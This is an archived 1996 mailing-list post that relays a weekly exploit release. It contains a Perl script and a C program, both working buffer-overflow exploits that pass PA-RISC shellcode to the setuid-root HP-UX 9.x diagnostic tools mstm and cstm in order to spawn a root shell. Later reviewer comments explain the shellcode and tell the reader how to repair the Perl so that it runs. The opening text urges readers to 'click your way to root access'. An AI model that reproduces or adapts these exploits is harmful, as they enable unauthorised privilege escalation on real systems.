This week: turn me on, dead man
Aleph One (aleph1@underground.org), Sat, 16 Nov 1996 11:38:33 -0800
>From our SOD friends. Sponsored by the HP security team & the energizer bunny. They keep going, and going, and going. Aleph One / aleph1underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01
--- cut here ---
Well, hello. Welcome back. We're glad to see you. Have a drink. Take off that overcoat. Put down that submachine gun. Lay on the couch and pretend you're a duck. I'll be over here sending scripts to the masses. This week's script is the first of the buffer-overruns and it buggers up two very similar setuid root programs in /usr/diag/bin, mstm and cstm. It's only been playtested on the 9's, so use with care on the 10's, and as always, start clicking your way to root access with scripts from the folks at SOD. Caveat Emptor mstm and/or cstm loves you perl script and C src for this week
--- stmo.pl ---
#!/usr/bin/perl
# working exlpoit for 9.X setuid root /usr/diag/bin/[cm]stm
#
# Builds one argument for `mstm -l` and exec()s the setuid target with it.
# The argument is laid out as: 2 alignment bytes + a PA-RISC code stub,
# padded with 'C' to 208 bytes; an 16-byte data area holding "/bin/sh";
# then a trailing 4-byte value.  All offsets are hard-coded for the 9.X
# binaries (see the author's note above) -- nothing here probes the target,
# so this is a single-shot attempt with no feedback beyond the printed length.
use FileHandle;   # imported but never used below

# h2cs - turn a hex string such as "34010102" into its raw bytes, two hex
# digits per output byte, consuming the input from the left.
# NOTE(review): `local($stuff)=_;` is almost certainly `=@_;` with the `@`
# stripped by the archive's e-mail munging (the author's own address on the
# header line lost its `@` the same way).  As archived the sub would not
# receive its argument, and a $stuff that never becomes empty would keep
# the while loop from terminating -- restore `@_` before running this.
sub h2cs {
    local($stuff)=_;
    local($rv);
    while($stuff !~ /^$/) {
        $bob=$stuff;
        $bob =~ s/^(..).*$/$1/;      # $bob = the first two hex digits
        $stuff =~ s/^..//;           # drop them from the input
        $rv.=chr(oct("0x${bob}"));   # append the byte they encode
    }
    return $rv;
}

# PA-RISC code stub.  Per the mnemonics: r1 is derived from rp (the return
# pointer) minus 129, two byte stores zero positions 339(r1) and 342(r1),
# arg0 is pointed at 332(r1), r22 (the syscall number) is produced with an
# ldi/and pair rather than a direct literal -- presumably to avoid a byte
# the overflow could not carry -- and `ble 4(sr7,r1)` with r1=0xc0000004
# appears to be the HP-UX system-call gateway.  Not re-verified here.
$code="AA"; # two byte alignment
$code.=h2cs("34010102"); # ldi 129,r1
$code.=h2cs("08220401"); # sub rp,r1,r1
$code.=h2cs("602002a6"); # stb r0,339(r1)
#$code.=h2cs("602002ac"); # stb r0,342(r1)   (commented out here; present in the C version)
$code.=h2cs("b43a0298"); # addi 332,r1,arg0
$code.=h2cs("34160176"); # ldi 187,r22
$code.=h2cs("34010276"); # ldi 315,r1
$code.=h2cs("08360216"); # and r22,r1,r22
$code.=h2cs("20200801"); # ldil l%c0000004,r1
$code.=h2cs("e420e008"); # ble 4(sr7,r1)
$code.=h2cs("08210280"); # NOP == xor r1,r1,r0
#$code.=h2cs("deadcafe"); # illegal instruction   (debugging marker, left disabled)

$num=208-length($code);
$code.="C"x$num;               # pad the code section to exactly 208 bytes
$data="/bin/sh.sh.";           # the '.' bytes look like NUL placeholders: 332+7=339
                               # and 332+10=342 match the stb offsets above
$num=16-length($data);
$data.="D"x$num;               # pad the data section to 16 bytes
$num=224-length($of);          # dead: $of is not assigned yet and $num is not
                               # read again; harmless, but misleading
$of=$code.$data;               # 208 + 16 = 224 bytes
$of.=h2cs("7b03301B");         # 4 bytes past the 224-byte body; presumably the
                               # value that lands on the saved return pointer
print "Length is: ",length($of),"\n";
exec("/usr/diag/bin/mstm","-l","$of");   # list-form exec: no shell, $of is one argv entry
--- stmo.c ---
/* SOD /usr/diag/bin/[cm]stm buffer overflow */
/*
 * Pre-assembled form of the Perl payload: 2 alignment bytes, the PA-RISC
 * stub, 'C' filler, "/bin/sh.-i." plus 'D' filler, and the trailing
 * 7b 03 30 1b.  It is NOT byte-identical to the Perl script: both stb
 * stores are present here, there is an extra xor NOP before the ldil, and
 * the data area is "/bin/sh.-i." rather than "/bin/sh.sh.".
 * main() is K&R style with no includes, so strcpy()/execl() are implicitly
 * declared; that compiled on the HP-UX cc of the day but a modern compiler
 * will reject or warn on it.
 */
main() {
    char buf[500];
    /* fixed literal, well under sizeof buf, so the local copy itself is not the overflow */
    strcpy(buf,"\x41\x41\x34\x01\x01\x02\x08\x22\x04\x01\x60\x20\x02\xa6\x60\x20\x02\xac\xb4\x3a\x02\x98\x34\x16\x01\x76\x34\x01\x02\x76\x08\x36\x02\x16\x08\x21\x02\x80\x20\x20\x08\x01\xe4\x20\xe0\x08\x08\x21\x02\x80\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x2f\x62\x69\x6e\x2f\x73\x68\x2e\x2d\x69\x2e\x44\x44\x44\x44\x44\x7b\x03\x30\x1b");
    execl("/usr/diag/bin/mstm","/usr/diag/bin/mstm","-l",buf,(char *)0);
    /* Either-or, same overflow */
    /* only reached when the mstm execl() fails -- execl() does not return on success */
    execl("/usr/diag/bin/cstm","/usr/diag/bin/cstm","-l",buf,(char *)0);
}